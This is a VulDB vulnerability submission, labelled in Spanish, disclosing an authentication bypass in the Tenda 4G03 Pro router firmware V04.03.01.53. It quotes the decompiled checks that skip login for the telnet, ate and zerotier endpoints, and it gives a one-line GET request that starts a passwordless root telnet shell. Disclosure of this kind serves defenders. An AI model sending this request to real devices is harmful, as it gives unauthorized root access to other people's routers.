| Título | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 Authentication Bypass Issues |
|---|
| Descripción | Tenda 4G03 Pro V1.0 /bin/httpd authentication bypass for sensitive endpoints
The R7WebsSecurityHandler function (FUN_00021a54) in /usr/sbin/httpd
of Tenda 4G03 Pro V1.0 firmware V04.03.01.53 explicitly skips
authentication for three sensitive management endpoints when the
admin password is unset (factory default). Sending GET
/goform/telnet starts a persistent root telnet daemon on TCP/23.
The /goform/ate endpoint enables OS command injection. The
/goform/zerotier endpoint exposes VPN tunnel configuration. All
three are accessible with zero credentials on a factory-default device.
POC:
Auth bypass code (FUN_00021a54):
if (strncmp(url,"/goform/telnet",0xe)==0 &&
DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/ate",0xb)==0 &&
DAT_00050f14=='\0') goto pass_through;
if (strncmp(url,"/goform/zerotier",0x10)==0 &&
DAT_00050f14=='\0') goto pass_through;
PoC — spawn root telnet shell:
GET /goform/telnet HTTP/1.1
Host: 192.168.0.1
Result: telnetd starts on TCP/23, login as root with no password |
|---|
| Usuario | CoreNode (UID 96566) |
|---|
| Sumisión | 2026-03-18 03:16 (hace 19 días) |
|---|
| Moderación | 2026-04-04 08:20 (17 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 355279 [Tenda 4G03 Pro hasta 1.0/1.1/04.03.01.53/192.168.0.1 /bin/httpd escalada de privilegios] |
|---|
| Puntos | 17 |
|---|